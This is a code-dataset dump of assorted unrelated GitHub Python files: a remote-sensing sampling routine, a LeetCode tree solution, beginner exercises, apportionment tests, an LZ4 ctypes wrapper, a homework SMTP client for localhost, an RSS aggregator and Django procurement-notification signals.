self.toc(feedback, result)\r\n\r\n return result\r\n\r\n @classmethod\r\n def drawSamples(cls, N: List[Union[int, float]], dump: ClassifierDump, proportional: bool, replace: bool, feedback):\r\n indices = list()\r\n if len(N) == 1:\r\n N = N * len(dump.categories)\r\n if len(N) != len(dump.categories):\r\n raise QgsProcessingException(\r\n f'Number of sample sizes ({len(N)}) not matching number of categories ({len(dump.categories)}).')\r\n for c, Ni in zip(dump.categories, N):\r\n valid = np.where(dump.y == c.value)[0]\r\n n = len(valid)\r\n if proportional:\r\n Ni = int(round(n * Ni / 100)) # derive absolute Ni\r\n if not replace:\r\n Ni = min(n, Ni)\r\n feedback.pushInfo(f'Draw {Ni} of {n} samples [{c.name}]')\r\n if Ni == 0:\r\n continue\r\n drawn = np.random.choice(valid, Ni, replace=replace)\r\n indices.extend(drawn.tolist())\r\n\r\n indices2 = np.full((dump.X.shape[0],), True, bool)\r\n indices2[indices] = False\r\n indices2 = np.where(indices2)[0].tolist()\r\n\r\n return indices, indices2\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapboxprocessing/algorithm/randomsamplesfromclassificationdatasetalgorithm.py","file_name":"randomsamplesfromclassificationdatasetalgorithm.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"3108207517","text":"# Return any binary tree that matches the given preorder and postorder traversal\n# s. \n# \n# Values in the traversals pre and post are distinct positive integers. \n# \n# \n# \n# \n# Example 1: \n# \n# \n# Input: pre = [1,2,4,5,3,6,7], post = [4,5,2,6,7,3,1]\n# Output: [1,2,3,4,5,6,7]\n# \n# \n# \n# \n# Note: \n# \n# \n# 1 <= pre.length == post.length <= 30 \n# pre[] and post[] are both permutations of 1, 2, ..., pre.length. \n# It is guaranteed an answer exists. If there exists multiple answers, you can \n# return any of them. \n# \n# \n# Related Topics Tree\n\n\nclass TreeNode(object):\n def __init__(self, v):\n self.val = v\n\n\ndef toTree(arr, s):\n n = len(arr)\n if s < n:\n if arr[s]:\n l = 2 * s + 1\n r = 2 * s + 2\n return TreeNode(arr[s],\n toTree(arr, l) if l < n else None,\n toTree(arr, r) if r < n else None)\n else:\n return None\n\n\nfrom random import random\nfrom graphviz import Digraph\n\n\ndef gen_tree(cur_val, new_node_prob=1.0):\n f = 0.7\n if random() < new_node_prob:\n left_node, next_val = gen_tree(cur_val + 1, new_node_prob * f)\n right_node, next_val = gen_tree(next_val, new_node_prob * f)\n tr = TreeNode(cur_val)\n tr.left = left_node\n tr.right = right_node\n return tr, next_val\n else:\n return None, cur_val\n\n\ndef render_helper(node, g):\n if node:\n g.node(str(node.val))\n if node.left:\n render_helper(node.left, g)\n g.edge(str(node.val), str(node.left.val))\n if node.right:\n render_helper(node.right, g)\n g.edge(str(node.val), str(node.right.val))\n\n\ndef render(tree, name):\n g = Digraph(comment=name)\n render_helper(tree, g)\n g.render(name, '/home/sunilsn/leetcode/graphs')\n\n\ndef preorder(tree):\n return [tree.val] + preorder(tree.left) + preorder(tree.right) if tree else []\n\n\ndef postorder(tree):\n return postorder(tree.left) + postorder(tree.right) + [tree.val] if tree else []\n\n\nnull = None\n\n\ndef test():\n for n in range(10):\n cur_tree, _ = gen_tree(1)\n pre_tree = preorder(cur_tree)\n post_tree = postorder(cur_tree)\n print(pre_tree, post_tree)\n render(cur_tree, 'tree_%d' % n)\n s = Solution()\n reconstructed_tree = s.constructFromPrePost(pre_tree, post_tree)\n assert preorder(reconstructed_tree) == pre_tree\n assert postorder(reconstructed_tree) == post_tree\n\n\nfrom typing import List\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\ndef prepost(pre, post, post_index, s_pre, e_pre, s_post, e_post):\n if s_pre < e_pre:\n node = TreeNode(pre[s_pre])\n ls_pre = s_pre + 1\n le_post = post_index[pre[ls_pre]] + 1 if ls_pre < e_pre else e_post - 1\n le_pre = ls_pre + (le_post - s_post)\n ls_post = s_post\n node.left = prepost(pre, post, post_index, ls_pre, le_pre, ls_post, le_post)\n rs_pre = le_pre\n re_pre = e_pre\n rs_post = le_post\n re_post = e_post - 1\n node.right = prepost(pre, post, post_index, rs_pre, re_pre, rs_post, re_post)\n return node\n else:\n return None\n\n\nclass Solution:\n def constructFromPrePost(self, pre: List[int], post: List[int]) -> TreeNode:\n post_index = {x: i for i, x in enumerate(post)}\n n = len(pre)\n return prepost(pre, post, post_index, 0, n, 0, n)\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"sunilnandihalli/leetcode","sub_path":"editor/en/[889]Construct Binary Tree from Preorder and Postorder Traversal.py","file_name":"[889]Construct Binary Tree from Preorder and Postorder Traversal.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1219354075","text":"# 7-4\nprompt = \"\\nWhat toppings you want in your pizza? \"\nprompt += \"\\n(Enter 'quit' when you are finished.) \"\n\nactive = True\nwhile active:\n message = input(prompt)\n\n if message == 'quit':\n active = False\n else:\n print(f\" I'll add {message}\")\n","repo_name":"RunnerOnFoot/PCC","sub_path":"Chapter_7/Exercises/pizza_toppings_while_loop_flag.py","file_name":"pizza_toppings_while_loop_flag.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43757687994","text":"from unittest import TestCase\n\nfrom allocator import PukelsheimLowerApportionment, PukelsheimUpperApportionment\nfrom prepocessor import (\n MetadataParser,\n VotesParser,\n CantonSeatsParser,\n)\n\n\nclass TestPukelsheimLowerApportionment(TestCase):\n @staticmethod\n def _get_test_data():\n districts = {\n \"WK1\": 6,\n \"WK2\": 5,\n \"WK3\": 4,\n }\n parties = {\n \"A\": 6,\n \"B\": 5,\n \"C\": 4,\n }\n party_votes = {\n \"A\": {\"WK1\": 14400, \"WK2\": 10100, \"WK3\": 6400},\n \"B\": {\"WK1\": 12000, \"WK2\": 10000, \"WK3\": 6000},\n \"C\": {\"WK1\": 4500, \"WK2\": 9900, \"WK3\": 5000},\n }\n\n return districts, parties, party_votes\n\n def test_complete_run(self):\n pk = PukelsheimLowerApportionment(\n *TestPukelsheimLowerApportionment._get_test_data()\n )\n pk.init_district_div()\n\n # lower apportionment\n pk.calc_all_district_seats()\n pk.allocate_district_seats()\n\n # upper apportionment\n pk.allocate_party_seats()\n\n # check district seats\n self.assertEqual(6, pk._sum_of_district_seats(\"WK1\"))\n self.assertEqual(5, pk._sum_of_district_seats(\"WK2\"))\n self.assertEqual(4, pk._sum_of_district_seats(\"WK3\"))\n\n # check party seats\n self.assertEqual(6, pk._sum_of_party_seats(\"A\"))\n self.assertEqual(5, pk._sum_of_party_seats(\"B\"))\n self.assertEqual(4, pk._sum_of_party_seats(\"C\"))\n\n def test_check_allocated_seats(self):\n pk = PukelsheimLowerApportionment(\n *TestPukelsheimLowerApportionment._get_test_data()\n )\n self.assertFalse(pk.check_allocated_seats())\n pk.run()\n self.assertTrue(pk.check_allocated_seats())\n\n\nclass TestPukelsheimUpperApportionment(TestCase):\n def test_run_test_data(self):\n party_votes = {\n \"A\": {\"WK1\": 14400, \"WK2\": 10100, \"WK3\": 6400},\n \"B\": {\"WK1\": 12000, \"WK2\": 10000, \"WK3\": 6000},\n \"C\": {\"WK1\": 4500, \"WK2\": 9900, \"WK3\": 5000},\n }\n\n districts = {\n \"WK1\": 6,\n \"WK2\": 5,\n \"WK3\": 4,\n }\n\n pk = PukelsheimUpperApportionment(party_votes, districts)\n res = pk.run()\n self.assertEqual(6, res.loc[\"seats\", \"A\"])\n self.assertEqual(5, res.loc[\"seats\", \"B\"])\n self.assertEqual(4, res.loc[\"seats\", \"C\"])\n\n def test_run_real_data(self):\n meta = MetadataParser()\n meta.read()\n canton_seats_parser = CantonSeatsParser(\n meta.cantons_name_dict, meta.cantons\n )\n canton_seats_df = canton_seats_parser.read()\n canton_seats_df.drop(\"Total\", axis=1, inplace=True)\n\n vote = VotesParser(meta.cantons_dict, meta.parties_dict)\n votes_cantonal = vote.read_canton_level(\n meta.get_empty_canton_party_data_frame()\n )\n votes_cantonal.drop(\"2nd round\", axis=1, inplace=True)\n votes_cantonal.drop(\"Others\", axis=1, inplace=True)\n pku = PukelsheimUpperApportionment(votes_cantonal, canton_seats_df)\n upper_apportionment = pku.run()\n self.assertEqual(200, upper_apportionment.loc[\"seats\"].sum())\n","repo_name":"tcinbis/biprop-election-report","sub_path":"tests/test_allocator.py","file_name":"test_allocator.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45561257496","text":"import ctypes\nfrom ctypes import *\n\nfrom pathlib import Path\nfrom typing import Tuple\n\n\nclass Mem:\n K1 = 1024\n K2 = 2 * K1\n K4 = 4 * K1\n K8 = 8 * K1\n K16 = 16 * K1\n K32 = 32 * K1\n K64 = 64 * K1\n K128 = 128 * K1\n K256 = 256 * K1\n K512 = 512 * K1\n M1 = 1024 * K1\n M4 = 4 * M1\n\n @staticmethod\n def round_up(value: int, step: int):\n return (value + step - 1) // step * step\n\n\ndef _offset_pointer(pointer, pointer_class, offset):\n return pointer_class(ctypes.addressof(pointer) + offset)\n\n\ndef load_library(path: Path):\n return cdll.LoadLibrary(str(path))\n\n\nclass LZ4Wrapper:\n lib_cdll: ctypes.CDLL = load_library(Path(__file__).parent / 'msys-lz4-1.dll')\n\n @classmethod\n def reload_library(cls, path: Path):\n cls.lib_cdll = cdll.LoadLibrary(str(path))\n\n # LZ4LIB_API int LZ4_compressBound(int inputSize);\n _lz4_compress_bound = lib_cdll.LZ4_compressBound\n _lz4_compress_bound.argtypes = [c_int32]\n _lz4_compress_bound.restype = c_int32\n\n def compress_bound(self, size):\n return self._lz4_compress_bound(size)\n\n # LZ4LIB_API int LZ4_decompress_safe (const char* src, char* dst, int compressedSize, int dstCapacity);\n _lz4_decompress_safe = lib_cdll.LZ4_decompress_safe\n _lz4_decompress_safe.argtypes = [c_char_p, c_char_p, c_int32, c_int32]\n _lz4_decompress_safe.restype = c_int32\n\n def decompress_safe(self, compressed_data: bytes, decompressed_size: int):\n compressed_buffer = create_string_buffer(compressed_data)\n decompressed_buffer = create_string_buffer(decompressed_size)\n rv = self._lz4_decompress_safe(compressed_buffer, decompressed_buffer, len(compressed_data), decompressed_size)\n assert rv > 1, f'Received error code from LZ4:{rv}'\n assert rv == decompressed_size\n decompressed_data = bytes(decompressed_buffer.raw[:rv])\n del compressed_buffer\n del decompressed_buffer\n return decompressed_data\n\n # LZ4LIB_API int LZ4_compress_fast (const char* src, char* dst, int srcSize, int dstCapacity, int acceleration);\n _lz4_compress_fast = lib_cdll.LZ4_compress_fast\n _lz4_compress_fast.argtypes = [c_char_p, c_char_p, c_int32, c_int32, c_int32]\n _lz4_compress_fast.restype = c_int32\n\n def compress_fast(self, data: bytes, acceleration=1):\n assert acceleration < 65537, f'{acceleration} is higher than LZ4_ACCELERATION_MAX(65537)'\n data_buffer = create_string_buffer(data)\n minimum_buffer_size = self.compress_bound(len(data))\n compressed_buffer = create_string_buffer(minimum_buffer_size)\n rv = self._lz4_compress_fast(data_buffer, compressed_buffer, len(data), minimum_buffer_size, acceleration)\n assert rv > 1, f'Received error code from LZ4:{rv}'\n compressed_data = bytes(compressed_buffer.raw[:rv])\n del data_buffer\n del compressed_buffer\n return compressed_data\n\n\nclass LZ4StreamWrapper(LZ4Wrapper):\n class LZ4_streamDecode_t(ctypes.Structure):\n pass\n\n LZ4_streamDecode_t._fields_ = [\n ('externalDict', c_char_p),\n ('extDictSize', c_uint32),\n ('prefixEnd', c_char_p),\n ('prefixSize', c_uint32),\n ]\n\n lib_cdll = LZ4Wrapper.lib_cdll\n\n def __init__(self):\n self._stream_state = self._lz4_create_steam_decode()\n pass\n\n def __del__(self):\n rv = self._lz4_free_steam_decode(self._stream_state)\n assert rv == 0, f'Received error code from LZ4:{rv}'\n\n # LZ4LIB_API LZ4_streamDecode_t* LZ4_createStreamDecode(void);\n _lz4_create_steam_decode = lib_cdll.LZ4_createStreamDecode\n _lz4_create_steam_decode.argtypes = []\n _lz4_create_steam_decode.restype = POINTER(LZ4_streamDecode_t)\n\n # LZ4LIB_API int LZ4_freeStreamDecode (LZ4_streamDecode_t* LZ4_stream);\n _lz4_free_steam_decode = lib_cdll.LZ4_freeStreamDecode\n _lz4_free_steam_decode.argtypes = [POINTER(LZ4_streamDecode_t)]\n _lz4_free_steam_decode.restype = c_int32\n\n\nclass LZ4ChainDecoder(LZ4StreamWrapper):\n lib_cdll = LZ4Wrapper.lib_cdll\n\n def __init__(self, block_size, extra_blocks=0):\n super().__init__()\n self._block_size = Mem.round_up(max(block_size, Mem.K1), Mem.K1)\n self._extra_blocks = max(extra_blocks, 0)\n self._output_length = Mem.K64 + (1 + extra_blocks) * self._block_size + 32\n self._output_index = 0\n self._output_buffer = create_string_buffer(self._output_length + 8)\n\n def decode(self, source: c_char_p, source_size, block_size: int) -> int:\n if block_size <= 0:\n block_size = self._block_size\n self.prepare(block_size)\n tmp = _offset_pointer(self._output_buffer, c_char_p, self._output_index)\n decoded_size = self.decode_block(source, source_size, tmp, block_size)\n assert decoded_size > 0, f'Received error code from LZ4:{decoded_size}'\n self._output_index += decoded_size\n return decoded_size\n\n def prepare(self, block_size: int) -> None:\n if self._output_index + block_size <= self._output_length:\n return\n self._output_index = self.copy_dict(self._output_index)\n\n def copy_dict(self, index):\n dict_start = max(index - Mem.K64, 0)\n dict_size = index - dict_start\n self._output_buffer.raw[:] = self._output_buffer[dict_size:]\n self._stream_state.prefixSize = dict_size\n self._stream_state.prefixEnd = _offset_pointer(self._output_buffer, c_char_p, dict_size)\n self._stream_state.externalDict = 0\n self._stream_state.extDictSize = 0\n return dict_size\n\n # LZ4LIB_API int LZ4_decompress_safe_continue (LZ4_streamDecode_t* LZ4_streamDecode, const char* src, char* dst, int srcSize, int dstCapacity);\n _lz4_decompress_safe_continue = lib_cdll.LZ4_decompress_safe_continue\n _lz4_decompress_safe_continue.argtypes = [POINTER(LZ4StreamWrapper.LZ4_streamDecode_t), c_char_p, c_char_p, c_int32,\n c_int32]\n _lz4_decompress_safe_continue.restype = c_int32\n\n def decode_block(self, data, data_size: int, target, target_size):\n rv = self._lz4_decompress_safe_continue(self._stream_state, data, target, data_size, target_size)\n del data\n return rv\n\n def drain(self, target: c_char_p, offset: int, size: int) -> None:\n offset = self._output_index + offset\n if offset < 0 or size < 0 or offset + size > self._output_index:\n raise AssertionError('Invalid operation')\n\n memmove(target, _offset_pointer(self._output_buffer, c_char_p, offset), size)\n\n def decode_and_drain(self, source, source_size, target, target_size) -> Tuple[bool, int]:\n decoded = 0\n if source_size <= 0:\n return False, decoded\n decoded = self.decode(source, source_size, target_size)\n if decoded <= 0 or target_size < decoded:\n return False, decoded\n self.drain(target, -decoded, decoded)\n return True, decoded\n\n def decompress(self, compressed_data, decompressed_size):\n data = create_string_buffer(compressed_data)\n output = create_string_buffer(decompressed_size)\n self.decode_and_drain(data, len(compressed_data), output, decompressed_size)\n return bytes(output.raw)\n\n\nif __name__ == '__main__':\n a = LZ4ChainDecoder(1)\n d = b'b\\x01\\x00\\x00\\x00\\x13\\x00\\x01\\x00\\xe00H\\x0ef\\x06\\x00\\x00\\x00\\x01\\xfd=\\xdc\\x0b\\x1e\\x11\\x00p\\x00\\xc6V\\xa5#\\x1a\\x00\\x14\\x00\\x02#\\x00fHw\\x17\\x12\\x1a\\x00\\x01\\x00B\\x12\\xda\\xd3v*\\x00B\\x80i;\\x1c\\n\\x00SkXW\\xe5\\x01 \\x00B\\xb7\\xb0h=\\x0c\\x00b\\x80\\xbf\\x19\\xbf[5\"\\x00@\\xf0i\\xb6\\xfc\\n\\x00r1\\x00\\xb2\\x01\\x0cx\\t+\\x00`\\xff#\\x99\\x00\\xcd\\x06\\n\\x00@b\\x1c\\x1b\\xc6\\x1f\\x00\\xf1\\x00worldspawn\\x00\\x16\\x02 \\xe4<\\x00!.0\\x01\\x00\\x1d \\t\\x00_\\x00\\xcf\\xda\\x98\\xba#\\x00\\x0cA,\\xe4\\xc1\\x19x\\x00\\x04\\x1a\\x00\\r\\t\\x00R\\x008\\xa0c\\xa9\\x9b\\x00@\\x86\\x81\\x8b\\x9c\\n\\x00\\xe0construct\\x00\\xb3b\\xf2\\xd3\\x12\\x00\\xd0sky_day01_01\\x00'\n b = create_string_buffer(321)\n cd = a.decode_block(d, len(d), b, 321)\n print(cd)\n","repo_name":"stepa2/SourceIO","sub_path":"utilities/lz4_wrapper/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"4563042822","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields\n\n\nclass irUiView(models.Model):\n\n _inherit = 'ir.ui.view'\n\n view_theme_id = fields.Many2one('ir.ui.view.theme', string=\"Theme\")\n company_ids = fields.Many2many('res.company', 'res_company_ir_ui_view_rel', 'user_id', 'view_id', string='Companies')\n","repo_name":"njeudy/qweb-report-addons","sub_path":"report_ng/models/ir_ui_view.py","file_name":"ir_ui_view.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35634635728","text":"#Student 1 Name: Paul Grad\n#Student 1 ID: 94574913\n#Student 2 Name: Mayan Shoshani\n#Student 2 ID: 15019784\nfrom socket import *\nmsg = \"\\r\\n I love computer networks!\"\nendmsg = \"\\r\\n.\\r\\n\"\n# Connect to the local host (an EECS server, where this code should be executed)\nmailserver = \"localhost\"\n# Create socket called clientSocket and establish a TCP connection with mailserver\n#Fill in start\nclientSocket = socket(AF_INET, SOCK_STREAM)\nserverPort =25\nclientSocket.connect((mailserver,serverPort))\n\n#Fill in end\nrecv = clientSocket.recv(1024).decode()\nprint(recv)\nif recv[:3] != '220':\n print('220 reply not received from server.')\n# Send HELO command and print server response.\nheloCommand = 'HELO Alice\\r\\n'\nclientSocket.send(heloCommand.encode())\nrecv1 = clientSocket.recv(1024).decode()\nprint(recv1)\nif recv1[:3] != '250':\n print('250 reply not received from server.')\n# Send MAIL FROM command and print server response.\n# Fill in start\nheloCommand = 'MAIL FROM: \\r\\n'\nclientSocket.send(heloCommand.encode())\nrecv1 = clientSocket.recv(1024).decode()\nprint(recv1)\nif recv1[:3] != '250':\n print('250 reply not received from server.')\n# Fill in end\n# Send RCPT TO command and print server response.\n# Fill in start\nheloCommand = 'RCPT TO: \\r\\n'\nclientSocket.send(heloCommand.encode())\nrecv1 = clientSocket.recv(1024).decode()\nprint(recv1)\nif recv1[:3] != '250':\n print('250 reply not received from server.')\n# Fill in end\n# Send DATA command and print server response.\n# Fill in start\nheloCommand = 'DATA\\r\\n'\nclientSocket.send(heloCommand.encode())\nrecv1 = clientSocket.recv(1024).decode()\nprint(recv1)\nif recv1[:3] != '354':\n print('250 reply not received from server.')\n# Fill in end\n# Send message data.\n# Fill in start\nheloCommand = 'hi\\r\\n'\nclientSocket.send(heloCommand.encode())\n# Fill in end\n# Message ends with a single period.\n# Fill in start\nheloCommand = '.\\r\\n'\nclientSocket.send(heloCommand.encode())\nrecv1 = clientSocket.recv(1024).decode()\nprint(recv1)\nif recv1[:3] != '250':\n print('250 reply not received from server.')\n# Fill in end\n# Send QUIT command and get server response.\n# Fill in start\nheloCommand = 'QUIT\\r\\n'\nclientSocket.send(heloCommand.encode())\nrecv1 = clientSocket.recv(1024).decode()\nprint(recv1)\nif recv1[:3] != '221':\n print('250 reply not received from server.')\n# Fill in end\n","repo_name":"shoshanimayan/network2","sub_path":"hw2/smtp_client.py","file_name":"smtp_client.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15533102321","text":"command = input()\ndict_results = {}\ndict_language = {}\nwhile command != \"exam finished\":\n result = command.split(\"-\")\n if result[1] != \"banned\":\n name, language, mark = result[0], result[1], int(result[2])\n\n if language not in dict_language:\n dict_language[language] = 1\n else:\n dict_language[language] += 1\n\n if name not in dict_results:\n dict_results[name] = mark\n elif dict_results[name] < mark:\n dict_results[name] = mark\n\n else: # banned\n banned_user = result[0]\n del dict_results[banned_user]\n command = input()\n\n# print(dict_results)\n# print(dict_language)\n\nsorted_dict_results = dict(sorted(dict_results.items(), key=lambda x: (-x[1], x[0]))) # by HIGHEST mark, then by name\nsorted_dict_language = dict(sorted(dict_language.items(), key=lambda x: (-x[1], x[0]))) # by MOST participants, then by lang. name\n# print(sorted_dict_results)\nprint(\"Results:\")\nfor k, v in sorted_dict_results.items():\n print(f\"{k} | {v}\")\n\nprint(\"Submissions:\")\nfor k, v in sorted_dict_language.items():\n print(f\"{k} - {v}\")\n","repo_name":"karalkal/SoftUni_Python_Fundamentals","sub_path":"07_Dictionaries/2_exercises/ex11_softuni_exam_results.py","file_name":"ex11_softuni_exam_results.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"790438867","text":"#!/usr/bin/env python\n\"\"\"\nch05_plucker_aggregator.py\n\nPoll subscriptions, produce HTML summaries, wrap up as a plucker document.\n\"\"\"\n\nimport sys, time\nfrom agglib import *\nimport PyPlucker.Spider\n\nHTML_FN = \"plucker-aggregator-%s.html\" % time.strftime(\"%Y%m%d-%H%M%S\")\nFEEDS_FN = \"plucker_feeds.txt\"\nFEED_DB_FN = \"plucker_feeds_db\"\nENTRY_DB_FN = \"plucker_entry_seen_db\"\n\nPLUCKER_DIR = \".\"\nPLUCKER_TITLE = \"%s News\" % time.strftime(\"%Y%m%d-%H%M%S\")\nPLUCKER_FN = \"plucker-%s\" % time.strftime(\"%Y%m%d-%H%M%S\")\nPLUCKER_BPP = \"0\"\nPLUCKER_DEPTH = \"1\"\n\ndef main(): \n \"\"\"\n Poll subscribed feeds and produce aggregator page.\n \"\"\"\n feed_db, entry_db = openDBs(FEED_DB_FN, ENTRY_DB_FN)\n\n feeds = [ x.strip() for x in open(FEEDS_FN, \"r\").readlines() ]\n \n entries = getNewFeedEntries(feeds, feed_db, entry_db)\n \n if len(entries) > 0:\n out_fn = HTML_FN\n writeAggregatorPage(entries, out_fn, DATE_HDR_TMPL, FEED_HDR_TMPL, \n ENTRY_TMPL, PAGE_TMPL)\n buildPluckerDocument(PLUCKER_DIR, PLUCKER_FN, PLUCKER_TITLE, \n PLUCKER_DEPTH, PLUCKER_BPP, HTML_FN)\n \n closeDBs(feed_db, entry_db)\n\ndef buildPluckerDocument(pdir, pfn, ptitle, pdepth, pbpp, html_fn):\n \"\"\"\n Given some Plucker settings and an HTML file, attempt to build a \n Plucker document.\n \"\"\"\n PyPlucker.Spider.realmain(None, argv=[\n sys.argv[0],\n '-P', pdir,\n '-f', pfn,\n '-H', html_fn,\n '-N', ptitle,\n '-M', pdepth,\n '--bpp', pbpp,\n '--title=%s' % ptitle,\n ])\n\n# Presentation templates for output follow:\n\nDATE_HDR_TMPL = \"\"\"\n

%s

\n\"\"\"\n\nFEED_HDR_TMPL = \"\"\"\n

%(feed.title)s

\n\"\"\"\n\nENTRY_TMPL = \"\"\"\n
\n
\n %(time)s: \n %(entry.title)s\n
\n
\n %(entry.summary)s\n
\n %(content)s\n
\n
\n\"\"\"\n\nPAGE_TMPL = \"\"\"\n\n \n \n \n

Feed aggregator #1

\n %s\n \n\n\"\"\"\n\nif __name__ == \"__main__\": main()\n","repo_name":"lmorchard/hacking_rss_and_atom","sub_path":"ch05_plucker_aggregator.py","file_name":"ch05_plucker_aggregator.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"73413027364","text":"from django.core.exceptions import ValidationError\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.mail import send_mail\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom smtplib import SMTPException\n\nfrom bhp_personnel.models import Notifications\nfrom .proxy_user import ProxyUser\nfrom .purchase_order import PurchaseOrder\nfrom .purchase_requisition import PurchaseRequisition\nfrom .request_approval import Request, RequestApproval\nfrom .signature import Signature\n\n\n@receiver(post_save, weak=False, sender=PurchaseRequisition)\n@receiver(post_save, weak=False, sender=PurchaseOrder)\ndef create_request_approval(sender, instance, raw, created, **kwargs):\n if not raw:\n if created:\n if sender.__name__ == 'PurchaseRequisition':\n document_id = instance.prf_number\n request_by = instance.request_by\n else:\n document_id = instance.order_number\n request_by = get_prf_field(instance.prf_number, 'request_by')\n try:\n RequestApproval.objects.get(\n document_id=document_id)\n except RequestApproval.DoesNotExist:\n RequestApproval.objects.create(\n document_id=document_id,\n request_by=request_by)\n\n\n@receiver(post_save, weak=False, sender=RequestApproval,\n dispatch_uid='request_on_post_save')\ndef request_approval_on_post_save(sender, instance, raw, created, **kwargs):\n if not raw:\n if instance.approved:\n if is_purchase_requisition(instance.document_id):\n subject = f'Preparation of PO for document no. {instance.document_id} request'\n users = ProxyUser.objects.filter(groups__name='Procurement')\n message = (f'Purchase requisition {instance.document_id} has been '\n 'approved and a PO can now be prepared. ')\n from_email = 'adiphoko@bhp.org.bw'\n to_emails = [user.email for user in users]\n send_email_notification(\n instance, subject=subject, message=message, from_email=from_email,\n to_emails=to_emails)\n update_prf_field(instance.document_id, 'approved', True)\n elif is_purchase_order(instance.document_id):\n subject = f'Purchase order authorization'\n message = (f'Purchase order {instance.document_id} has been '\n 'authorised. ')\n from_email = 'adiphoko@bhp.org.bw'\n send_email_notification(\n instance, subject=subject, message=message, from_email=from_email,\n to_emails=[instance.request_by.email, ])\n update_obj_field(\n model_cls=PurchaseOrder, identifier_field='order_number',\n identifier_value=instance.document_id,\n field_name='authorised', value=True)\n\n\n@receiver(post_save, weak=False, sender=Request,\n dispatch_uid='request_on_post_save')\ndef request_on_post_save(sender, instance, raw, created, **kwargs):\n \"\"\"\n Notify user of an approval request for documents.\n \"\"\"\n subject = (f'Approval Request for document no. {instance.request_approval.document_id}')\n if not raw:\n request_approval = instance.request_approval\n current_site = get_current_site(request=None)\n if created:\n message = (f'Dear {instance.request_to.get_full_name()} \\n\\n Please note'\n f' {request_approval.request_by} is requesting your'\n f' approval for {request_approval.document_id}'\n f' on the BHP Utility system http://{current_site.domain}. \\n\\n'\n 'Good day :).')\n from_email = 'adiphoko@bhp.org.bw'\n send_email_notification(\n instance, subject=subject, message=message, from_email=from_email,\n to_emails=[instance.request_to.email, ], status=instance.status)\n\n elif instance.status in ['approved', 'rejected']:\n message = (f'Dear {request_approval.request_by} \\n\\n Please be informed '\n f'Document no. {request_approval.document_id} has been {instance.status}.'\n f'Visit http://{current_site.domain} for further details.')\n from_email = 'adiphoko@bhp.org.bw'\n user = check_user(request_approval.request_by)\n send_email_notification(\n instance, subject=subject, message=message, from_email=from_email,\n to_emails=[user.email, ], status=instance.status)\n\n elif instance.status == 'pending':\n message = (f'Dear {instance.request_to.get_full_name()} \\n\\n Please note'\n f' {request_approval.request_by} is re-requesting your'\n f' approval for {request_approval.document_id}'\n f' on the BHP Utility system http://{current_site.domain}. \\n\\n'\n 'Good day :).')\n from_email = 'adiphoko@bhp.org.bw'\n send_email_notification(\n instance, subject=subject, message=message, from_email=from_email,\n to_emails=[instance.request_to.email, ], status=instance.status)\n\n\ndef send_email_notification(\n instance, subject=None, message=None, from_email=None, to_emails=[], status=None):\n try:\n send_mail(subject, message, from_email, to_emails, fail_silently=False)\n except SMTPException as e:\n raise ValidationError(f'There was an error sending an email: {e}')\n else:\n# Notifications.objects.create(\n# email=instance.request_to.email, success_status=True)\n if status:\n if status == 'new':\n instance.status = 'pending'\n if instance.request_reason in 'prf_approval':\n value = instance.request_to\n update_prf_field(\n prf_number=instance.request_approval.document_id, field_name='approval_by', value=value)\n elif instance.request_reason == 'confirm_funds':\n value = instance.request_to\n update_prf_field(\n prf_number=instance.request_approval.document_id, field_name='funds_confirmed', value=value)\n elif instance.request_reason == 'po_auth_one':\n value = instance.request_to\n update_obj_field(\n model_cls=PurchaseOrder, identifier_field='order_number',\n identifier_value=instance.request_approval.document_id, field_name='first_approver', value=value)\n elif instance.request_reason == 'po_auth_two':\n value = instance.request_to\n update_obj_field(\n model_cls=PurchaseOrder, identifier_field='order_number',\n identifier_value=instance.request_approval.document_id, field_name='second_approver', value=value)\n elif instance.request_reason == 'executive_approval':\n identifier = instance.request_approval.document_id\n value = instance.request_to\n if is_purchase_requisition(identifier):\n update_obj_field(\n model_cls=PurchaseRequisition, identifier_field='prf_number',\n identifier_value=identifier, field_name='approval_by', value=value)\n else:\n update_obj_field(\n model_cls=PurchaseOrder, identifier_field='order_number',\n identifier_value=identifier, field_name='first_approver', value=value)\n instance.save()\n else:\n instance.status = status\n if instance.status == 'approved':\n signature = user_signature(instance.request_to)\n instance.approval_sign = signature\n\n\ndef check_user(user):\n if not isinstance(user, ProxyUser):\n try:\n return ProxyUser.objects.get(id=user.id)\n except ProxyUser.DoesNotExist:\n raise ValidationError(f'User does not exist.')\n return user\n\n\ndef update_prf_field(prf_number=None, field_name=None, value=None):\n try:\n prf = PurchaseRequisition.objects.get(prf_number=prf_number)\n except PurchaseRequisition.DoesNotExist:\n raise ValidationError('Purchase Requisition matching id does not exist')\n else:\n setattr(prf, field_name, value)\n prf.save()\n\n\ndef update_obj_field(model_cls=None, identifier_field=None,\n identifier_value=None, field_name=None, 